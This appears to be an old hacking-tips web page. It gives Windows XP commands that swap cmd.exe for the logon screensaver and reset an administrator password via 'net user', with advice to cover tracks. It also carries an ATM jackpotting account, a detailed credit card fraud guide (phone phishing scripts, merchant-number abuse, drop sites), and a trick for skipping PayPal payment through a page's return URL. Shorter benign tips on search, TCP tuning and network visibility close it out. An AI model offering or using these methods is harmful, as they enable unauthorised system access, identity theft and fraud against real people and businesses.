Learn How to hack administrator account with a limited user account?

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack (creates the folder temphack)
copy logon.scr temphack\logon.scr (backsup logon.scr)
copy cmd.exe temphack\cmd.exe (backsup cmd.exe)
del logon.scr (deletes original logon.scr)
rename cmd.exe logon.scr (renames cmd.exe to logon.scr)
exit (quits dos)
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

By: dragonabv

Any updates, Errors, Suggestions or just general comments mail them to either.

Teachnix@gmail.com or dragonabv@live.com

Jackpotting ATM Machines

JACKPOTTING was done rather successfully a while back in (you guessed it)
New York. What the culprits did was:
Sever (actually cross over) the line between the ATM and the
host. insert a microcomputer between the ATM and the host. insert
a fradulent card into the ATM. (card=cash card, not hardware)
What the ATM did was: send a signal to the host, saying "Hey! Can I
give this guy money, or is he broke, or is his card invalid?"
What the microcomputer did was: intercept the signal from the host,
discard it, send "there's no one using the ATM" signal.
What the host did was: get the "no one using" signal, send back "okay,
then for God's sake don't spit out any money!" signal to ATM.
What the microcomputer did was:
intercept signal (again), throw it away (again), send "Wow! That
guy is like TOO rich! Give him as much money as he wants. In
fact, he's so loaded, give him ALL the cash we have! He is
really a valued customer." signal.
What the ATM did:
what else? Obediently dispense cash till the cows came home (or
very nearly so).
What the crooks got:
well in excess of $120,000 (for one weekend's work), and several
years when they were caught.
This story was used at a CRYPTOGRAPHY conference I attended a while
ago to demonstrate the need for better information security. The
lines between ATM's & their hosts are usually 'weak' in the sense that
the information transmitted on them is generally not encrypted in any
way. One of the ways that JACKPOTTING can be defeated is to encrypt
the information passing between the ATM and the host. As long as the
key cannot be determined from the ciphertext, the transmission (and
hence the transaction) is secure.
A more believable, technically accurate story might concern a person
who uses a computer between the ATM and the host to determine the key
before actually fooling the host. As everyone knows, people find
cryptanalysis a very exciting and engrossing subject...don't they?
(Hee-Hee)

_____ ______
| |-<<-| |-<<-| | |ATM| micro |Host| |___|->>-| |->>-|____|

The B of A ATM's are connected through dedicated lines to a host
computer as the Bishop said. However, for maintenance purposes, there
is at least one separate dial-up line also going to that same host
computer. This guy basically bs'ed his way over the phone till he
found someone stupid enough to give him the number. After finding that,
he had has Apple hack at the code. Simple.
Step 2: He had a friend go to an ATM with any B of A ATM card. He
stayed at home with the Apple connected to the host. When his friend
inserted the card, the host displayed it. The guy with the Apple
modified the status & number of the card directly in the host's
memory. He turned the card into a security card, used for testing
purposes. At that point, the ATM did whatever it's operator told it to
do.
The next day, he went into the bank with the $2000 he received,
talked to the manager and told him every detail of what he'd done. The
manager gave him his business card and told him that he had a job
waiting for him when he got out of school.
Now, B of A has been warned, they might have changed the system. On
the other hand, it'd be awful expensive to do that over the whole
country when only a handful of people have the resources and even less
have the intelligence to duplicate the feat. Who knows?

ATM Jackpotting video
for more Tricks click

How do they Credit Card Fraud??

For most of you out there, money is hard to come by. Until now:

With the recent advent of plastic money (credit cards), it is
easy to use someone else's credit card to order the items you have
always desired in life. The stakes are high, but the payoff is
worth it.

Step One: Getting the credit card information

First off, you must obtain the crucial item: someone's credit
card number. The best way to get credit card numbers is to take
the blue carbons used in a credit card transaction at your local
department store. These can usually be found in the garbage can
next to the register, or for the more daring, in the garbage
dumpster behind the store. But, due to the large amount of credit
card fraud, many stores have opted to use a carbonless transaction
sheet, making things much more difficult. This is where your
phone comes in handy.

First, look up someone in the phone book, and obtain as much
information as possible about them. Then, during business hours,
call in a very convincing voice - "Hello, this is Maria lauren from
the Visa Credit Card Fraud Investigations Department. We have
been informed that your credit card may have been used for
fraudulent purposes, so will you please read off the numbers
appearing on your Visa card for verification." Of course, use
your imagination! Believe it or not, many people will fall for
this ploy and give out their credit information.

Now, assuming that you have your victim's credit card number, you
should be able to decipher the information given.

Step Two: Recognizing information from carbon copies

Card examples:

[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE

[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE

Explanation:
MM/Y1 is the date the card was issued, and MM/Y2 is the
expiration date. The American Express Gold Card has numbers
XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5000.00,
even if the card holder is broke.

[Mastercard]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
JOE SHMOE

Explanation:
XXXX in the second row may be asked for during the ordering
process. The first date is when the card was new, and the
second is when the card expires. The most frequent number
combination used is 5424 1800 XXXX XXXX. There are many of
these cards in circulation, but many of these are on wanted
lists, so check these first.

[Visa]
4XXX XXX(X) XXX(X) XXX(X)
MM/YY MM/YY*VISA
JOE SHMOE

Explanation:
Visa is the most abundant card, and is accepted almost
everywhere. The "*VISA" is sometimes replaced with "BWG", or
followed with a special code. These codes are as follows:

[1] MM/YY*VISA V - Preferred Card
[2] MM/YY*VISA CV - Classic Card
[3] MM/YY*VISA PV - Premier Card

Preferred Cards are backed with money, and are much safer to
use. Classic Cards are newer, harder to reproduce cards with
decent backing. Premier Cards are Classic Cards with Preferred
coverage. Common numbers are 4448 020 XXX XXX, 4254 5123 6000
XXXX, and 4254 5123 8500 XXXX. Any 4712 1250 XXXX XXXX cards
are IBM Credit Union cards, and are risky to use, although
they are usually covered for large purchases.

Step Three: Testing credit

You should now have a Visa, Mastercard, or American Express
credit card number, with the victim's address, zip code, and phone
number. By the way, if you have problems getting the address,
most phone companies offer the Address Tracking Service, which is
a special number you call that will give you an address from a
phone number, at a nominal charge. Now you need to check the
balance of credit on the credit card (to make sure you don't run
out of money), and you must also make sure that the card isn't
stolen.
To do this you must obtain a phone number that
businesses use to check out credit cards during purchases. If you
go to a department store, watch the cashier when someone makes a
credit card purchase. He/she will usually call a phone number,
give the credit information, and then give what is called a
"Merchant Number". These numbers are usually written down on or
around the register. It is easy to either find these numbers and
copy them, or to wait until they call one in. Watch what they
dial and wait for the 8 digit (usually) merchant number. Once you
call the number, in a calm voice, read off the account number,
merchant number, amount, and expiration date. The credit bureau
will tell you if it is ok, and will give you an authorization
number. Pretend you are writing this number down, and repeat it
back to them to check it. Ignore this number completely, for it
serves no real purpose. However, once you do this, the bank
removes dollars equal to what you told them, because the card was
supposedly used to make a purchase. Sometimes you can trick the
operator by telling her the customer changed his mind and decided
not to charge it. Of course, some will not allow this. Remember
at all times that you are supposed to be a store clerk calling to
check out the card for a purchase. Act like you are talking with
a customer when he/she "cancels".

Step Four: The drop

Once the cards are cleared, you must find a place to have the
package sent. NEVER use a drop more than once. The following are
typical drop sites:

[1] An empty house

An empty house makes an excellent place to send things. Send the
package UPS, and leave a note on the door saying, "UPS. I work
days, 8 to 6. Could you please leave the package on the back door
step?" You can find dozens of houses from a real estate agent by
telling them you want to look around for a house. Ask for a list
of twenty houses for sale, and tell them you will check out the
area. Do so, until you find one that suits your needs.

[2] Rent A Spot

U-Haul sometimes rents spaces where you can have packages sent and
signed for. End your space when the package arrives.

[3] People's houses

Find someone you do not know, and have the package sent there.
Call ahead saying that "I called the store and they sent the
package to the wrong address. It was already sent, but can you
keep it there for me?" This is a very reliable way if you keep
calm when talking to the people.

Do NOT try post office boxes. Most of the time, UPS will not
deliver to a post office box, and many people have been caught in
the past attempting to use a post office box. Also, when you have
determined a drop site, keep an eye on it for suspicious
characters and cars that have not been there before.

Step Five: Making the transaction

You should now have a reliable credit card number with all the
necessary billing information, and a good drop site.

The best place to order from is catalogues, and mail order houses.
It is in your best interest to place the phone call from a pay
phone, especially if it is a 1-800 number. Now, when you call,
don't try to disguise your voice, thinking you will trick the
salesperson into believing you are an adult. These folks are
trained to detect this, so your best bet is to order in your own
voice. They will ask for the following: name, name as it appears
on card, phone number, billing address, expiration date, method of
shipping, and product. Ask if they offer UPS Red shipping (next
day arrival), because it gives them less time to research an
order. If you are using American Express, you might have a bit of
a problem shipping to an address other than the billing address.
Also, if the salesperson starts to ask questions, do NOT hang up.
Simply talk your way out of the situation, so you won't encourage
investigation on the order.

If everything goes right, you should have the product, free of
charge. Insurance picks up the tab, and no one is any wiser. Be
careful, and try not to order anything over $500. In some states,
UPS requires a signature for anything over $200, not to mention
that anything over $200 is defined as grand theft, as well as
credit fraud. Get caught doing this, and you will bite it for a
couple of years. Good luck!

Real google hacks "Untold"

Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services. For example, you can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches. You can also use this program to use google as a proxy. The name should not imply the way it should be used. Hacks is meant as this definition. "A Hack is a modification of a program or device to give the user access to features otherwise were unavailable to them. " Taken from Wikipedia. Please do not use this program for illegal uses. If you have used this program to find a vulnerability or if your domain is being taken advantage of, we suggest you use Google Hacks Honey Pot Disclaimer What im hoping by releasing this program is that it will help crack down on illegal and illegally distributed copyrighted material.

To download Google hack setup.exe

Special thanks to Jason Stallings

Download free free from a paypal site without paying a penny!!

Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor

2) Search for the word "return"

3) Next to it you can find the url for the thank you page

4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:

Code:

http://www.ramphelp.com/halfpipe.html

About half way down the page you will find:

Copy the link into your browser and download.

How to increase download speed 100 to 200 kpbs..

First of all download this wonderful program:

TCP Optimizer

Then when u start the program goto settings goto cable modem or dsl whatever u have.

Go to MaxMTU and set it to 1500 this is optimal anything above this will not work as well.

That's about it!! 

Enjoy the Speed!!

How to Hide in the (Network) Neighborhood

Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.

In the Run box, type net config server /hidden:yes

Click OK.

Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.

click here for more